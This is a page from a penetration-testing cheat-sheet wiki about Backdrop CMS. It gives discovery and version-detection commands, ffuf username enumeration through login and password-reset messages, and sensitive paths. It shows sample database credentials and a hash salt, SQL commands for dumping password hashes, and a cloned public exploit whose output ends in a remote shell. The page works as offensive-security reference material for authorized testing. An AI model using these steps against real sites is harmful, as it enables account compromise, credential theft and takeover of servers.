Backdrop CMS

Backdrop CMS is a fork of Drupal 7, designed for simplicity. Many Drupal concepts apply.

Discovery

# Generator meta tag
curl -s http://TARGET | grep -i 'backdrop'
# Look for: Backdrop CMS 1 (https://backdropcms.org)

# Nmap script detection
nmap -sC -sV TARGET
# http-generator: Backdrop CMS 1

# robots.txt common entries
curl http://TARGET/robots.txt
# /core/ /profiles/ /README.md /admin /user/login /user/register

Version Detection

# Via module .info files
curl http://TARGET/core/modules/redirect/redirect.info

# Output:
# project = backdrop
# version = 1.27.1
# timestamp = 1709862662

# Alternative locations
curl http://TARGET/core/modules/node/node.info
curl http://TARGET/core/modules/system/system.info

Username Enumeration

Backdrop returns different error messages for valid vs invalid usernames:

Invalid username: "Sorry, unrecognized username."
Valid username, wrong password: "Sorry, incorrect password."

# ffuf username enumeration via login
ffuf -X POST \
    -H "Content-Type: application/x-www-form-urlencoded" \
    -d "name=FUZZ&pass=invalid&form_build_id=form-xxx&form_id=user_login&op=Log+in" \
    -u "http://TARGET/?q=user/login" \
    -w /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt \
    -fr "Sorry, unrecognized username."

Password Reset Enumeration

# ffuf username enumeration via password reset
ffuf -X POST \
    -H "Content-Type: application/x-www-form-urlencoded" \
    -d "name=FUZZ&form_build_id=form-xxx&form_id=user_pass&op=Reset+password" \
    -u "http://TARGET/?q=user/password" \
    -w /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt \
    -fr "is not recognized as a user name or an email address."

Note: Update form_build_id from a fresh page request. Rate limiting may kick in after too many attempts.

Important Paths

Path

Description

/?q=user/login

/?q=user/password

Password reset

/?q=admin

Admin panel

/settings.php

Database credentials

/files/config_*/active/

Configuration JSON files

/files/config_*/staging/

Staging config files

/core/modules/

Core modules directory

/modules/

Custom/contrib modules

Configuration Files

settings.php

# Database connection string format
$database = 'mysql://root:[email protected]/backdrop';

# Config directories
$config_directories['active'] = './files/config_83dddd18e1ec67fd8ff5bba2453c7fb3/active';
$config_directories['staging'] = './files/config_83dddd18e1ec67fd8ff5bba2453c7fb3/staging';

# Hash salt
$settings['hash_salt'] = 'aWFvPQNGZSz1DQ701dD4lC5v1hQW34NefHvyZUzlThQ';

Config Directory Enumeration

# Find user-related config
find . | grep config_ | grep user

# Useful config files
./files/config_*/active/user.mail.json           # Email templates
./files/config_*/active/user.role.administrator.json  # Admin role perms
./files/config_*/active/update.settings.json     # May contain emails

Database

Backdrop uses Drupal-style password hashing (salted stretched SHA-512).

# Connect with discovered credentials
mysql -u root -h 127.0.0.1 -pBackDropJ2024DS2024

# Enumerate users
use backdrop;
select name,pass from users;

# Hash format: $S$E...
# Not directly crackable with hashcat (custom algorithm)

Authenticated RCE (Module Upload)

Requires: Admin or user with module upload permissions

Automated Exploit

# Clone exploit
git clone https://github.com/rvizx/backdrop-rce

# Run exploit
python3 exploit.py http://TARGET username password

# Output:
# [>] logging in as user: 'username'
# [>] login successful
# [>] enabling maintenance mode
# [>] uploading payload
# [>] shell is live
# [>] interactive shell – type 'exit' to quit

Reference: https://github.com/rvizx/backdrop-rce

References

https://backdropcms.org/
https://github.com/rvizx/backdrop-rce
https://github.com/V1n1v131r4/CSRF-to-RCE-on-Backdrop-CMS

PreviousXWiki NextGitea

Last updated 5 days ago

hashtagDiscovery

hashtagVersion Detection

hashtagUsername Enumeration

hashtagLogin Form Enumeration

hashtagPassword Reset Enumeration

hashtagImportant Paths

hashtagConfiguration Files

hashtagsettings.php

hashtagConfig Directory Enumeration

hashtagDatabase

hashtagAuthenticated RCE (Module Upload)

hashtagAutomated Exploit

hashtagReferences